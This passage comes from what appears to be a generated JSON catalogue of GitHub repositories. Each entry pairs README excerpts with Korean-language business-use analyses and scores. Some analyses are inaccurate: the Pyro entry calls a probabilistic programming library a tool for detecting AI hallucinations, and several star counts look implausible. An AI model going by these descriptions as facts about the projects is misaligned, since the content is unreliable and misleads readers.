보물인가\n대규모 데이터를 빠르게 처리하고 분석하는 오픈소스 도구들을 한곳에 모아놓은 가이드북으로, 데이터 기반 사업을 시작하려는 스타트업들이 기술 선택에 드는 시간과 비용을 획기적으로 줄일 수 있습니다.\n\n## 어디에 쓸 수 있나\n\n**1. SaaS 서비스**\n- 개별 고객사의 방대한 거래 데이터를 실","readme_excerpt":"# Awesome Big Data\n\n[![Awesome](https://cdn.rawgit.com/sindresorhus/awesome/d7305f38d29fed78fa85652e3a63e154dd8e8829/media/badge.svg)](https://github.com/sindresorhus/awesome)\n\nA curated list of awesome big data frameworks, resources and other awesomeness. Inspired by [awesome-php](https://github.com/ziadoz/awesome-php), [awesome-python](https://github.com/vinta/awesome-python), [awesome-ruby](https://github.com/Sdogruyol/awesome-ruby), [hadoopecosystemtable](http://hadoopecosystemtable.github.io/) & [big-data](http://usefulstuff.io/big-data/).\n\nYour contributions are always welcome!\n\n- [Awesome Big Data](#awesome-big-data)\n  - [RDBMS](#rdbms)\n  - [Frameworks](#frameworks)\n  - [Distributed Programming](#distributed-programming)\n  - [Distributed Filesystem](#distributed-filesystem)\n  - [Distributed Index](#distributed-index)\n  - [Document Data Model](#document-data-model)\n  - [Key Map Data Model](#key-map-data-model)\n  - [Key-value Data Model](#key-value-data-model)\n  - [Graph Data Mode","composite_score":0.2533,"license_safety_tag":"safe"},{"name":"ucla-mobility/OpenCDA","github_url":"https://github.com/ucla-mobility/OpenCDA","stars":6,"language":"Python","license":"NOASSERTION","abandonment_months":12,"description":"# OpenCDA 프로젝트 분석\n\n## 왜 보물인가\n자동차들이 서로 통신하면서 안전하게 움직이는 기술을 만드는 오픈소스 프로젝트로, 미래의 자율주행차 산업에 필수적인 기반 기술입니다.\n\n## 어디에 쓸 수 있나\n\n**1. 자동차 제조사 및 부품업체 대상 B2B 소프트웨어**\n- 자동차들 간 통신 기술을 테스트하고 개발하는 플랫폼으로 판매\n\n**2. 자율주행","readme_excerpt":"# OpenCDA\n[![Build Status](https://travis-ci.com/ucla-mobility/OpenCDA.svg?branch=develop)](https://travis-ci.com/ucla-mobility/OpenCDA)\n[![Coverage Status](https://coveralls.io/repos/github/ucla-mobility/OpenCDA/badge.svg?branch=feature/readme_revise)](https://coveralls.io/github/ucla-mobility/OpenCDA?branch=feature/readme_revise)\n[![Documentation Status](https://readthedocs.org/projects/opencda-documentation/badge/?version=latest)](https://opencda-documentation.readthedocs.io/en/latest/?badge=latest)\n\n\nOpenCDA is an open co-simulation-based **research/engineering framework** integrated with prototype cooperative driving automation (CDA; see [SAE J3216](https://www.sae.org/standards/content/j3216_202005/)) pipelines as well as regular automated driving components (e.g., perception, localization, planning, control).  It not only enables CDA evaluation in a CARLA + SUMO co-simulation environment but also provides a rich library of source codes of CDA research pipelines. \n\nIn collaborati","composite_score":0.2529,"license_safety_tag":"unknown"},{"name":"curtinlv/JD-Script","github_url":"https://github.com/curtinlv/JD-Script","stars":18,"language":"Python","license":"MIT","abandonment_months":12,"description":"# JD-Script 저장소 분석\n\n## 왜 보물인가\n쇼핑몰 자동화 작업을 프로그래밍 지식 없이도 실행할 수 있는 실용적인 도구입니다.\n\n## 어디에 쓸 수 있나\n\n1. **SaaS 서비스**: 온라인 쇼핑몰 운영자를 위한 구독형 자동화 플랫폼으로, 월별 요금을 받고 자동 주문·배송 관리 기능 제공\n2. **내부 업무 도구**: 중소 전자상거래 회사의 반복","readme_excerpt":"\n# DartNode  https://dartnode.com\n[![Powered by DartNode](https://dartnode.com/branding/DN-Open-Source-sm.png)](https://dartnode.com \"Powered by DartNode - Free VPS for Open Source\")\n\n\n# JD 关注有礼\n\n##  目录结构\n    JD-Script/                  #主仓库\n    |-- getFollowGifts                # 主目录\n    |   |-- jd_getFollowGift.py       # 主代码 （必要）\n    |   |-- JDCookies.txt             # 存放JD cookie，一行一个ck\n    |   |-- Readme.md                 # 说明书\n    |   `-- start.sh                  # shell脚本（非必要）\n    `-- README.md\n\n\n### `【兼容环境】`\n    1.Python3.6+ 环境\n    2.兼容ios设备软件：Pythonista 3、Pyto(已测试正常跑，其他软件自行测试)   \n    3.Windows exe \n\n    安装依赖模块 :\n    pip3 install requests\n    执行：\n    python3 jd_getFollowGift.py\n\n\n## `【更新记录】`\n    2021.6.6：（v1.0.0 Beta）\n        * Test\n\n\n###### [GitHub仓库 https://github.com/curtinlv/JD-Script](https://github.com/curtinlv/JD-Script) \n###### [TG频道 https://t.me/TopStyle2021](https://t.me/TopStyle2021)\n###### [TG群 https://t.me/topStyle996](https://t.me/topStyle996)\n###### 关注公众号【TopSt","composite_score":0.2527,"license_safety_tag":"safe"},{"name":"rubensousa/ViewPagerCards","github_url":"https://github.com/rubensousa/ViewPagerCards","stars":6,"language":"Java","license":"Apache-2.0","abandonment_months":3,"description":"# ViewPagerCards 상용화 분석\n\n## 왜 보물인가\n스마트폰 앱에서 카드처럼 넘기며 볼 수 있는 사용자 경험을 만드는 오픈소스 도구로, 앱 개발자들이 자주 필요로 하지만 처음부터 만들기 어려운 기능입니다.\n\n## 어디에 쓸 수 있나\n- **dating/social 앱 서비스**: 프로필 카드를 좌우로 넘기는 기능이 필요한 매칭 플랫폼에 솔루션 제","readme_excerpt":"# ViewPagerCards\nViewPager cards inspired by Duolingo\n\nFrom my blog post: https://rubensousa.com/2016/08/20/viewpagercards/\n\nThis is just a sample project.\n\n**Note: this project is no longer being maintained**\n\n<img src=\"https://rubensousa.github.io/img/duolingo_viewpager.gif\" width=300></img> <img src=\"https://rubensousa.github.io/img/viewpager_result.gif\" width=300></img>\n\n \nThere's support included for Fragments and normal Views. Check the CardPagerAdapter and CardFragmentPagerAdapter classes.\n\n**Left** - Duolingo implementation\n\n**Right** - This sample\n\n\n**What you could do with this:**\n\n1. Showcasing premium features\n2. An app intro\n2. A small gallery of images\n\n\n## License\n\n    Copyright 2016 Rúben Sousa\n    \n    Licensed under the Apache License, Version 2.0 (the \"License\");\n    you may not use this file except in compliance with the License.\n    You may obtain a copy of the License at\n    \n        http://www.apache.org/licenses/LICENSE-2.0\n    \n    Unless required by applicable","composite_score":0.2526,"license_safety_tag":"safe"},{"name":"fluttercandies/wechat_flutter","github_url":"https://github.com/fluttercandies/wechat_flutter","stars":5,"language":"Dart","license":"Apache-2.0","abandonment_months":3,"description":"# wechat_flutter 저장소 분석\n\n## 왜 보물인가\nWeChat(중국의 카카오톡)과 호환되는 모바일 앱을 만드는 오픈소스 도구로, 중국 시장 진출을 원하는 기업들에게 개발 시간과 비용을 크게 줄여줄 수 있습니다.\n\n## 어디에 쓸 수 있나\n\n**1. SaaS 서비스: WeChat 연동 채팅 플랫폼**\n중국 사용자들이 WeChat 계정으로 바로 로","readme_excerpt":"[![GitHub stars](https://img.shields.io/github/stars/fluttercandies/wechat_flutter)](https://github.com/fluttercandies/wechat_flutter/stargazers)\n[![GitHub forks](https://img.shields.io/github/forks/fluttercandies/wechat_flutter)](https://github.com/fluttercandies/wechat_flutter/network)\n[![GitHub issues](https://img.shields.io/github/issues/fluttercandies/wechat_flutter)](https://github.com/fluttercandies/wechat_flutter/issues)\n![star](https://gitcode.com/fluttercandies/wechat_flutter/star/badge.svg)\n\n> 如果产生其他依赖无法编译的问题，可以尝试将`pubspec.yaml`中的`dependencies`中的所有依赖的\"^\"\n> 去掉或者插件版本号改为any，重新编译尝试。\n> 还是出错的话在项目主目录执行`flutter clean`再重新运行。\n> 如果出现插件版本不适配记得看`pubspec.yaml`文件介绍的插件flutter版本是否与自己本地Flutter适配。\n\n# 相关文档\n\n[问题列表与解决方案](issues_list.md)\n\n[English README_EN.md](README_EN.md)\n\n# 课程说明\n\n本项目出配套课程啦，耗时6个月打造，flutter3最新版本，从0到1实现微信，包含im聊天单聊群聊功能：https://edu.csdn.net/course/detail/39189\n\n课程demo下载地址 https://wwpj.lanzouu.com/s/wechat-new-demo\n\n商务合作联系微信【q1666655】，定制开发、帮面试、出技术方案、解决Apple Store上架4.3问题.\n\nBusiness D","composite_score":0.2523,"license_safety_tag":"safe"},{"name":"Maslow/laf","github_url":"https://github.com/Maslow/laf","stars":5,"language":"TypeScript","license":"Apache-2.0","abandonment_months":13,"description":"# Maslow/laf 상용화 분석\n\n## 왜 보물인가\n복잡한 서버 운영 없이 간단한 코드만으로 웹 서비스를 만들 수 있는 기술로, 비개발자도 아이디어를 빠르게 서비스로 만들 수 있습니다.\n\n## 어디에 쓸 수 있나\n\n**1. SaaS 서비스**\n- 중소 회사들이 자체 자동화 업무 도구(이메일 자동 발송, 데이터 처리 등)를 저렴하게 구축하는 서비스로 제공","readme_excerpt":"![laf](https://socialify.git.ci/labring/laf/image?description=1&descriptionEditable=%E5%83%8F%E5%86%99%E5%8D%9A%E5%AE%A2%E4%B8%80%E6%A0%B7%E5%86%99%E4%BB%A3%E7%A0%81%EF%BC%81&font=Inter&forks=1&language=1&name=1&owner=1&pattern=Circuit%20Board&stargazers=1&theme=Dark)\n\n<div align=\"center\">\n  <p>\n    <b>像写博客一样写函数！</b>\n  </p>\n\n  <p>\n  \n  [![Awesome](https://cdn.rawgit.com/sindresorhus/awesome/d7305f38d29fed78fa85652e3a63e154dd8e8829/media/badge.svg)](https://github.com/labring/laf)\n  [![](https://img.shields.io/docker/pulls/lafyun/system-server)](https://hub.docker.com/r/lafyun/system-server)\n  ![TypeScript](https://img.shields.io/badge/typescript-%23007ACC.svg?logo=typescript&logoColor=white)\n  [![Website](https://img.shields.io/website?url=https%3A%2F%2Flaf.run&logo=Postwoman)](https://laf.run/)\n  <img src=\"https://img.shields.io/badge/%E5%BE%AE%E4%BF%A1%E7%BE%A4-2000%2B-brightgreen\"></a>\n\n  </p>\n</div>\n\n---\n\n> 中文 | [English](README_en.md)\n## 👀 `laf` 是什么\n\nlaf 是开源的云开发平台，提供云函数、云数据库、云存储等开","composite_score":0.2519,"license_safety_tag":"safe"},{"name":"apache/incubator-openwhisk","github_url":"https://github.com/apache/incubator-openwhisk","stars":7,"language":"Scala","license":"Apache-2.0","abandonment_months":1,"description":"# Apache OpenWhisk 저장소 분석\n\n## 왜 보물인가\n필요할 때만 코드를 자동으로 실행해주는 기술로, 서버를 계속 켜둘 필요 없이 비용을 절감할 수 있습니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 사용자가 파일을 업로드할 때마다 자동으로 이미지 변환, 썸네일 생성 등을 처리하는 이미지 편집 서비스\n2. **내부 업무 도구**","readme_excerpt":"<!--\n#\n# Licensed to the Apache Software Foundation (ASF) under one or more\n# contributor license agreements.  See the NOTICE file distributed with\n# this work for additional information regarding copyright ownership.\n# The ASF licenses this file to You under the Apache License, Version 2.0\n# (the \"License\"); you may not use this file except in compliance with\n# the License.  You may obtain a copy of the License at\n#\n#     http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n#\n-->\n\n# OpenWhisk\n\n[![License](https://img.shields.io/badge/license-Apache--2.0-blue.svg)](http://www.apache.org/licenses/LICENSE-2.0)\n[![Join Slack](https://img.shields.io/badge/join-slack-9B69A0.svg)](https://","composite_score":0.2518,"license_safety_tag":"safe"},{"name":"epiphone/routing-controllers-openapi","github_url":"https://github.com/epiphone/routing-controllers-openapi","stars":6,"language":"TypeScript","license":"MIT","abandonment_months":4,"description":"# routing-controllers-openapi 평가 보고서\n\n## 왜 보물인가\n웹 서비스의 사용 설명서(API 문서)를 자동으로 만들어주는 도구로, 개발자들의 반복적인 문서화 작업을 크게 줄여줍니다.\n\n## 어디에 쓸 수 있나\n\n**1. SaaS 서비스**\n- 클라우드 기반 협업 도구나 데이터 분석 플랫폼이 제공하는 API를 자동으로 문서화하여 사용","readme_excerpt":"# routing-controllers-openapi\n\n[![codecov](https://codecov.io/gh/epiphone/routing-controllers-openapi/branch/master/graph/badge.svg)](https://codecov.io/gh/epiphone/routing-controllers-openapi) [![npm version](https://badge.fury.io/js/routing-controllers-openapi.svg)](https://badge.fury.io/js/routing-controllers-openapi)\n\nRuntime OpenAPI v3 schema generation for [routing-controllers](https://github.com/typestack/routing-controllers).\n\n## Installation\n\n`npm install --save routing-controllers-openapi`\n\n## Usage\n\n```typescript\nimport { getMetadataArgsStorage } from 'routing-controllers'\nimport { routingControllersToSpec } from 'routing-controllers-openapi'\n\n// Define your controllers as usual:\n\n@JsonController('/users')\nclass UsersController {\n  @Get('/:userId')\n  getUser(@Param('userId') userId: string) {\n    // ...\n  }\n\n  @HttpCode(201)\n  @Post('/')\n  createUser(@Body() body: CreateUserBody) {\n    // ...\n  }\n}\n\n// Generate a schema:\n\nconst storage = getMetadataArgsStorage()\nconst spec =","composite_score":0.2518,"license_safety_tag":"safe"},{"name":"colesbury/nogil","github_url":"https://github.com/colesbury/nogil","stars":10,"language":"Python","license":"NOASSERTION","abandonment_months":12,"description":"# nogil 프로젝트 분석\n\n## 왜 보물인가\n파이썬 프로그래밍 언어의 성능을 획기적으로 높일 수 있는 기술로, 현재 파이썬을 사용하는 모든 기업들의 속도 문제를 해결할 수 있습니다.\n\n## 어디에 쓸 수 있나\n\n1. **빅데이터 분석 SaaS**: 대규모 데이터를 빠르게 처리하는 분석 서비스로 제공하여 고객 분석 속도 단축\n2. **기계학습 API 판매","readme_excerpt":"# Python Multithreading without GIL\n\nCopyright (c) 2001-2022 Python Software Foundation.  All rights reserved.\n\nSee [Doc/license.rst](/Doc/license.rst) for copyright and license information.\n\n## Overview\n\nThis was a proof-of-concept implementation of CPython that supports multithreading without the global interpreter lock (GIL). An overview of the  design is described in the [Python Multithreading without GIL](https://docs.google.com/document/d/18CXhDb1ygxg-YXNBJNzfzZsDFosB5e6BfnXLlejd9l0/edit) Google doc.\n\nNow that [\"PEP 703 – Making the Global Interpreter Lock Optional in CPython\"](https://peps.python.org/pep-0703/) has been accepted, this project is not being actively worked on. Development is focused on making Python 3.13 and later releases support running without the global interpreter lock in a configuration called \"free-threading\".\n\nPlease use the \"free-threaded\" build of Python 3.13. For installation instructions, see https://py-free-threading.github.io/installing-cpython/.\n","composite_score":0.2516,"license_safety_tag":"unknown"},{"name":"heyimvikash/DSA-EndGame","github_url":"https://github.com/heyimvikash/DSA-EndGame","stars":13,"language":"Java","license":"MIT","abandonment_months":12,"description":"# DSA-EndGame 상용화 분석\n\n## 왜 보물인가\n복잡한 문제를 체계적으로 풀기 위한 실전 방법들을 모아둔 학습 자료로, 기술 면접 준비부터 실제 업무까지 폭넓게 활용할 수 있습니다.\n\n## 어디에 쓸 수 있나\n\n**1. 기술 면접 준비 SaaS**\n개발자들이 월 구독으로 면접 문제 풀이, 진도 추적, 피드백을 받는 웹 서비스로 운영 가능합니다.\n\n","readme_excerpt":"# **DSA-EndGame 🔥**\n\n## **Data Structures :-**\n\n### **Data Structures is a way of storing/organising data in the memory, in such a way that access, management and modification become efficient.**\n\n## **Algorithms :-**\n\n### **Algorithms is any approach you use to perform operations on data (like searching, sorting, traversing, ..Etc.).**\n\n# **Let's Walk through this repository :- <img src=\"https://media.giphy.com/media/L0wRdjkIlMsF5SWaLQ/giphy.gif\" width=\"60\">**\n1. ## [**Data Structures🧐**](./01.%20DataStructures)\n\t 1. ### [**LinkedList**](./01.%20DataStructures/01.%20LinkList)\n\t \t1. #### [**Singly LinkedList**](./01.%20DataStructures/01.%20LinkList/1.%20Singly-LinkList)\n\t \t1. #### [**Doubly LinkedList**](./01.%20DataStructures/01.%20LinkList/2.%20Doubly-LinkList)\n\t \t1. #### [**Circular LinkedList**](./01.%20DataStructures/01.%20LinkList/3.%20Circular-LinkList)\n\t1. ### [**Stack**](./01.%20DataStructures/02.%20Stack)\n\t\t1. #### [**Stack Using Array**](./01.%20DataStructures/02.%20Stack/Ba","composite_score":0.2516,"license_safety_tag":"safe"},{"name":"fossasia/open-event","github_url":"https://github.com/fossasia/open-event","stars":10,"language":"Python","license":"GPL-3.0","abandonment_months":12,"description":"# fossasia/open-event 상용화 분석\n\n## 왜 보물인가\n누구나 쉽게 행사(컨퍼런스, 전시회, 콘서트 등)를 온라인으로 관리하고 홍보할 수 있는 플랫폼입니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 중소 행사 주최사들이 월 구독으로 자신의 행사 정보를 웹사이트로 만들고 티켓 판매 관리\n2. **내부 업무 도구**: 대기업의 ","readme_excerpt":"# Open Event\n[![Gitter](https://badges.gitter.im/Join%20Chat.svg)](https://gitter.im/fossasia/open-event?utm_source=badge&utm_medium=badge&utm_campaign=pr-badge&utm_content=badge) [![Mailing List](https://img.shields.io/badge/Mailing%20List-FOSSASIA-blue.svg)](https://groups.google.com/forum/#!forum/open-event)\n\nThe Open Event Project offers event managers a platform to help users organize events including concerts, conferences, summits and regular meetups . The components support organizers through all stages from event planning to publishing, marketing and ticket sales. Automated web and mobile apps help attendees to get information easily. The Open Event Project was originally started to support the organization of the [FOSSASIA OpenTechSummit](http://fossasia.org) and is maintained by the **FOSSASIA** community.The Open Event boasts a diverse ecosystem and is composed of several components:\n\n## Components of Open Event Ecosystem\n\n### The Open Event Format Definition\n[![Repository](","composite_score":0.2511,"license_safety_tag":"restricted"},{"name":"robohorse/RoboPOJOGenerator","github_url":"https://github.com/robohorse/RoboPOJOGenerator","stars":28,"language":"Kotlin","license":"mit","abandonment_months":20,"description":"# RoboPOJOGenerator 상용화 분석\n\n## 왜 보물인가\n프로그래머가 손으로 작성해야 하는 반복적인 데이터 구조 코드를 자동으로 생성해주어 개발 시간을 크게 단축할 수 있습니다.\n\n## 어디에 쓸 수 있나\n\n1. **SaaS 서비스**: API 문서를 업로드하면 자동으로 개발에 필요한 코드를 만들어주는 개발자 보조 웹서비스\n2. **내부 업무 도","readme_excerpt":"# RoboPOJOGenerator\n\n[![Android Arsenal](https://img.shields.io/badge/Android%20Arsenal-RoboPOJOGenerator-green.svg?style=true)](https://android-arsenal.com/details/1/4429)\n\n<!-- Plugin description -->\n<p><b>IntelliJ IDEA</b> and <b>Android Studio</b> plugin.</p>\n\n<p>Generates Kotlin and Java data transfer objects from JSON payload. Just insert your JSON payload and select target serialisation framework.</p>\n\n<p><b>Keywords</b>: JsonToPojo, Json2Pojo, Kotlin, GSON, FastJSON, AutoValue, Jackson, LoganSquare, Moshi, Parcelable, Lombok, Jakarta JSON Binding, Java records, KotlinX.</p>\n<!-- Plugin description end -->\n\n# How to install\n\n<p>Just get it and install from the official <a href=\"https://plugins.jetbrains.com/plugin/8634\">plugin repository</a> or simply find it in <b>Preferences</b> -> <b>Plugins</b> -> <b>Marketplace</b> -> <b>RoboPOJOGenerator</b></p>\n<p><img src=\"images/install_v204.png\" alt=\"installation image\"></p>\n\n# How to use\n\n<p>1. Select a target package -> <b>New</b> ->","composite_score":0.2511,"license_safety_tag":"safe"},{"name":"linkedin/datahub","github_url":"https://github.com/linkedin/datahub","stars":6,"language":"Python","license":"Apache-2.0","abandonment_months":0,"description":"# LinkedIn DataHub 상용화 분석\n\n## 왜 보물인가\n회사의 흩어진 데이터들을 한곳에 모아서 누가 어떤 정보를 가지고 있는지 쉽게 찾을 수 있는 '데이터 지도'를 만드는 도구입니다.\n\n## 어디에 쓸 수 있나\n\n**1. SaaS 서비스**: 기업용 데이터 검색 플랫폼으로 운영하여 고객사가 자신의 데이터 자산을 체계적으로 관리하도록 제공합니다.\n","readme_excerpt":"<!--HOSTED_DOCS_ONLY\nimport useBaseUrl from '@docusaurus/useBaseUrl';\n\nexport const Logo = (props) => {\n  return (\n    <div style={{ display: \"flex\", justifyContent: \"center\", padding: \"20px\", height: \"190px\" }}>\n      <img\n        alt=\"DataHub Logo\"\n        src=\"https://raw.githubusercontent.com/datahub-project/static-assets/main/imgs/datahub-logo-color-mark.svg\"\n        {...props}\n      />\n    </div>\n  );\n};\n\n<Logo />\n\n<!--\nHOSTED_DOCS_ONLY-->\n<p align=\"center\">\n<a href=\"https://datahub.com\">\n<img alt=\"DataHub\" src=\"https://raw.githubusercontent.com/datahub-project/static-assets/main/imgs/datahub-logo-color-mark.svg\" height=\"150\" />\n</a>\n</p>\n<!-- -->\n\n# The #1 Open Source AI Data Catalog\n\n_Enterprise-grade metadata platform enabling discovery, governance, and observability across your entire data ecosystem_\n\n<p align=\"center\">\n  <a href=\"https://github.com/datahub-project/datahub/actions/workflows/build-and-test.yml\">\n    <img src=\"https://github.com/datahub-project/datahub/actions/","composite_score":0.2509,"license_safety_tag":"safe"},{"name":"uber/pyro","github_url":"https://github.com/uber/pyro","stars":13,"language":"Python","license":"apache-2.0","abandonment_months":11,"description":"# Uber Pyro 저장소 분석\n\n## 왜 보물인가\nAI가 복잡한 추론 과정에서 거짓 정보를 만들어내는 문제를 감지하고 방지하는 기술로, 신뢰할 수 있는 AI 시스템 구축의 핵심 솔루션입니다.\n\n## 어디에 쓸 수 있나\n\n**1. 금융 상담 플랫폼**\n은행이나 증권사의 AI 챗봇이 투자 조언을 할 때 잘못된 정보를 제공하지 않도록 검증하는 서비스로 제공\n","readme_excerpt":"<!--\nCopyright Contributors to the Pyro project.\n\nSPDX-License-Identifier: Apache-2.0\n-->\n\n<div align=\"center\">\n  <a href=\"http://pyro.ai\"> <img width=\"220px\" height=\"220px\" src=\"docs/source/_static/img/pyro_logo_with_text.png\"></a>\n</div>\n\n-----------------------------------------\n\n[![Build Status](https://github.com/pyro-ppl/pyro/workflows/CI/badge.svg)](https://github.com/pyro-ppl/pyro/actions)\n[![Coverage Status](https://coveralls.io/repos/github/pyro-ppl/pyro/badge.svg?branch=dev)](https://coveralls.io/github/pyro-ppl/pyro?branch=dev)\n[![Latest Version](https://badge.fury.io/py/pyro-ppl.svg)](https://pypi.python.org/pypi/pyro-ppl)\n[![Documentation Status](https://readthedocs.org/projects/pyro-ppl/badge/?version=dev)](http://pyro-ppl.readthedocs.io/en/stable/?badge=dev)\n[![CII Best Practices](https://bestpractices.coreinfrastructure.org/projects/3056/badge)](https://bestpractices.coreinfrastructure.org/projects/3056)\n\n[Getting Started](http://pyro.ai/examples) |\n[Documentation](htt","composite_score":0.2508,"license_safety_tag":"safe"},{"name":"codepath/android_guides","github_url":"https://github.com/codepath/android_guides","stars":16,"language":"","license":"mit","abandonment_months":4,"description":"# codepath/android_guides 분석\n\n## 왜 보물인가\n안드로이드 앱 개발을 배우려는 초보자들을 위한 실용적인 학습 자료로, 개발자 양성이 필요한 조직의 교육 비용을 크게 절감할 수 있습니다.\n\n## 어디에 쓸 수 있나\n\n1. **개발 교육 플랫폼**: 코딩 부트캠프나 온라인 교육사들이 이 가이드를 기반으로 유료 강좌 패키지를 판매\n2. *","readme_excerpt":"# CodePath Android Cliffnotes\n\nWelcome to the open-source [Codepath](http://codepath.com) Android Cliffnotes! Our goal is to become the **central crowdsourced resource** for complete and up-to-date Android content and tutorials. [Just take me to the notes](https://github.com/codepath/android_guides/wiki#getting-started)!\n\n[![CodePath](http://i.imgur.com/XgxWfyF.png)](http://codepath.com)\n\nWe have guides for everyone whether you are **beginner, intermediate or advanced**. Want to learn how to [use the ActionBar](https://github.com/codepath/android_guides/wiki/Defining-The-ActionBar) or the [ins and outs of fragments](https://github.com/codepath/android_guides/wiki/Creating-and-Using-Fragments)? We got that. Want to learn [about testing](https://github.com/codepath/android_guides/wiki/Android-Testing-Options) or how to [build flexible user interfaces for multiple devices](https://github.com/codepath/android_guides/wiki/Flexible-User-Interfaces)? We got you covered. We don't waste time wi","composite_score":0.2501,"license_safety_tag":"safe"},{"name":"sotayamashita/awesome-css","github_url":"https://github.com/sotayamashita/awesome-css","stars":6,"language":"","license":"CC-BY-SA-4.0","abandonment_months":19,"description":"# awesome-css 저장소 분석\n\n## 왜 보물인가\n웹사이트를 예쁘게 꾸미는 데 필요한 최고의 도구와 학습 자료들을 한곳에 모아놓은 큐레이션 모음집입니다.\n\n## 어디에 쓸 수 있나\n1. **웹 개발 교육 플랫폼**: 디자인 초보자들이 학습할 수 있는 체계적인 자료 라이브러리로 운영\n2. **디자인 에이전시 내부 도구**: 팀원들이 최신 디자인 트렌드","readme_excerpt":"[awesome-link]:  https://github.com/sindresorhus/awesome\n[awesome-badge]: https://cdn.rawgit.com/sindresorhus/awesome/d7305f38d29fed78fa85652e3a63e154dd8e8829/media/badge.svg\n[travis-link]:   https://travis-ci.org/awesome-css-group/awesome-css\n[travis-badge]:  https://travis-ci.org/awesome-css-group/awesome-css.svg?branch=master\n\n# Awesome CSS [![Awesome][awesome-badge]][awesome-link] [![Travis Build Status][travis-badge]][travis-link] \n\n> /* A curated list of awesome frameworks, style guides, and other cool nuggets for writing amazing CSS. */\n\n## Introduction\n\n### Motivation\n\nThis document is a curated list of frameworks, style guides, and cool nuggets of information for writing awesome CSS. It does not contain resources to learn CSS.\n\n### Complementary Resources\n\nIf you're struggling with something CSS-related, look for answers within the following resources:\n\n- [CSS - MDN - Mozilla](https://developer.mozilla.org/en-US/docs/Web/CSS)\n- [Reddit (CSS)](https://www.reddit.com/r/css/)\n- [","composite_score":0.25,"license_safety_tag":"unknown"},{"name":"GokuMohandas/MadeWithML","github_url":"https://github.com/GokuMohandas/MadeWithML","stars":5,"language":"Jupyter Notebook","license":"MIT","abandonment_months":3,"description":"# MadeWithML 저장소 분석\n\n## 왜 보물인가\n머신러닝 모델을 실제 서비스로 만드는 전체 과정을 배우고 바로 적용할 수 있는 실무 교과서입니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: AI 기반 데이터 분석 플랫폼으로 기업들에게 월 구독료로 판매\n2. **내부 업무 도구**: 회사의 고객 데이터나 판매 예측을 자동으로 분석하는 자","readme_excerpt":"<div align=\"center\">\n<h1><img width=\"30\" src=\"https://madewithml.com/static/images/rounded_logo.png\">&nbsp;<a href=\"https://madewithml.com/\">Made With ML</a></h1>\nDesign · Develop · Deploy · Iterate\n<br>\nJoin 40K+ developers in learning how to responsibly deliver value with ML.\n    <br>\n</div>\n\n<br>\n\n<div align=\"center\">\n    <a target=\"_blank\" href=\"https://madewithml.com/\"><img src=\"https://img.shields.io/badge/Subscribe-40K-brightgreen\"></a>&nbsp;\n    <a target=\"_blank\" href=\"https://github.com/GokuMohandas/Made-With-ML\"><img src=\"https://img.shields.io/github/stars/GokuMohandas/Made-With-ML.svg?style=social&label=Star\"></a>&nbsp;\n    <a target=\"_blank\" href=\"https://www.linkedin.com/in/goku\"><img src=\"https://img.shields.io/badge/style--5eba00.svg?label=LinkedIn&logo=linkedin&style=social\"></a>&nbsp;\n    <a target=\"_blank\" href=\"https://twitter.com/GokuMohandas\"><img src=\"https://img.shields.io/twitter/follow/GokuMohandas.svg?label=Follow&style=social\"></a>\n    <br>\n    🔥&nbsp; Amon","composite_score":0.25,"license_safety_tag":"safe"},{"name":"kriasoft/nodejs-api-starter","github_url":"https://github.com/kriasoft/nodejs-api-starter","stars":11,"language":"TypeScript","license":"mit","abandonment_months":19,"description":"# kriasoft/nodejs-api-starter 분석\n\n## 왜 보물인가\n웹사이트의 뒷단(서버)을 만들기 위한 완성된 템플릿으로, 개발자가 처음부터 모든 것을 만들 필요 없이 빠르게 시작할 수 있습니다.\n\n## 어디에 쓸 수 있나\n- **SaaS 서비스**: 구독형 소프트웨어(회계, 프로젝트 관리 도구 등)의 기초 서버 구축\n- **내부 업무 도구**","readme_excerpt":"<h1 align=\"center\">\n  <img src=\"https://s.tarkus.me/graphql-logo.png\" width=\"128\" height=\"128\" alt=\"GraphQL\" /><br>\n  GraphQL Starter Kit\n  <br>\n  <a href=\"http://www.typescriptlang.org/\"><img src=\"https://img.shields.io/badge/%3C%2F%3E-TypeScript-%230074c1.svg?style=flat-square\" height=\"20\"></a>\n  <a href=\"http://patreon.com/koistya\"><img src=\"https://img.shields.io/badge/dynamic/json?color=%23ff424d&label=Patreon&style=flat-square&query=data.attributes.patron_count&suffix=%20patrons&url=https%3A%2F%2Fwww.patreon.com%2Fapi%2Fcampaigns%2F233228\" height=\"20\"></a>\n  <a href=\"https://discord.gg/gx5pdvZ7Za\"><img src=\"https://img.shields.io/discord/643523529131950086?label=Chat&style=flat-square\" height=\"20\"></a>\n  <a href=\"https://github.com/kriasoft/graphql-starter-kit/stargazers\"><img src=\"https://img.shields.io/github/stars/kriasoft/graphql-starter-kit.svg?style=social&label=Star&maxAge=3600\" height=\"20\"></a>\n  <a href=\"https://twitter.com/koistya\"><img src=\"https://img.shields.io/twitt","composite_score":0.25,"license_safety_tag":"safe"},{"name":"legomushroom/mojs","github_url":"https://github.com/legomushroom/mojs","stars":23,"language":"CoffeeScript","license":"MIT","abandonment_months":1,"description":"# mojs 저장소 분석\n\n## 왜 보물인가\n웹사이트와 앱에서 화려한 애니메이션 효과를 쉽게 만들 수 있는 도구로, 사용자 경험을 크게 향상시킬 수 있습니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 마케팅 랜딩 페이지에 동적 애니메이션을 추가하여 사용자 이탈률 감소\n2. **내부 업무 도구**: 데이터 시각화 대시보드에 인터랙티브 차트 애","readme_excerpt":"# mo · js – [![npm](https://img.shields.io/npm/v/@mojs/core.svg)](https://www.npmjs.com/package/@mojs/core) [![ci](https://img.shields.io/github/actions/workflow/status/mojs/mojs/ci.yml?branch=main)](https://github.com/mojs/mojs/actions?query=workflow:\"CI\") [![Coverage Status](https://coveralls.io/repos/mojs/mojs/badge.svg?branch=main)](https://coveralls.io/r/mojs/mojs?branch=main) [![Slack](https://img.shields.io/badge/style-join-ff69b4.svg?label=slack)](https://join.slack.com/t/mojs/shared_invite/zt-dlyxhupt-VR7eV2uwCnvu3Cx~Yc_L9Q)\n\nThe motion graphics toolbelt for the web.\n\n[![mo · js](logo.svg 